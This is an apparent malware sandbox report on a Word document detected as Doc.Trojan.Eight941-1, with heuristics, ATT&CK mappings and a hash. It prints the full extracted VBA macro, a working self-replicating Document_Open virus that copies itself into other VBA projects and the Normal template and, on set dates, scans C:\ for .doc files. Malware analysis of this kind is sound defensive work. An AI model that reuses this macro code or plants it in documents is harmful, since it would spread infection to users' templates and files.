Verdict: MALICIOUS
Risk Score: 180
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The critical ClamAV heuristic and the presence of a Document_Open VBA macro indicate malicious intent. The macro attempts to copy itself to other VBA projects, suggesting an effort to persist or spread. The specific date check in the macro (November 10th or July 1st) is unusual and may be a trigger for further malicious activity, though the full payload is truncated.
Heuristics (3)
- ClamAV: Doc.Trojan.Eight941-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Eight941-1
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2398 bytes |

SHA-256: 171ab244a677f6e58a515d3fbe044886f745524907f2ec3e5afc8c7aee8c505f
Detection: ClamAV: Doc.Trojan.Eight941-1
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error GoTo 0
Dim i, j As Integer
j = -1
For i = 1 To Application.VBE.VBProjects.Count
If Application.VBE.VBProjects(i).Name = "Normal" Then
j = i
End If
If Application.VBE.VBProjects(i).VBComponents(1).CodeModule.Find("Document_Open", 1, 1, 1000, 100) = False Then
Dim B, l As Integer
If j > 0 Then
If Application.VBE.VBProjects(j).VBComponents(1).CodeModule.Find("Document_Open", 1, 1, 1000, 100) = True Then
B = Application.VBE.VBProjects(j).VBComponents(1).CodeModule.ProcStartLine("Document_Open", vbext_pk_Proc)
l = Application.VBE.VBProjects(j).VBComponents(1).CodeModule.ProcCountLines("Document_Open", vbext_pk_Proc)
Application.VBE.VBProjects(i).VBComponents(1).CodeModule.AddFromString Application.VBE.VBProjects(j).VBComponents(1).CodeModule.Lines(B, B + l)
Else
B = Me.VBProject.VBComponents(1).CodeModule.ProcStartLine("Document_Open", vbext_pk_Proc)
l = Me.VBProject.VBComponents(1).CodeModule.ProcCountLines("Document_Open", vbext_pk_Proc)
Application.VBE.VBProjects(i).VBComponents(1).CodeModule.AddFromString Me.VBProject.VBComponents(1).CodeModule.Lines(B, B + l)
End If
End If
End If
Next i
If (Month(Date) = 11 And Day(Date) = 10) Or (Month(Date) = 7 And Day(Date) = 1) Then
Set fs = Application.FileSearch
fs.LookIn = "c:\"
fs.FileName = "*.doc"
fs.SearchSubFolders = True
If fs.Execute() > 0 Then
For i = 1 To fs.FoundFiles.Count
On Error GoTo Exitsub
Options.AllowFastSave = True
Options.BackgroundSave = True
Options.CreateBackup = False
Options.SavePropertiesPrompt = False
Options.SaveNormalPrompt = False
Exitsub:
On Error GoTo 0
Next i
End If
End If
End Sub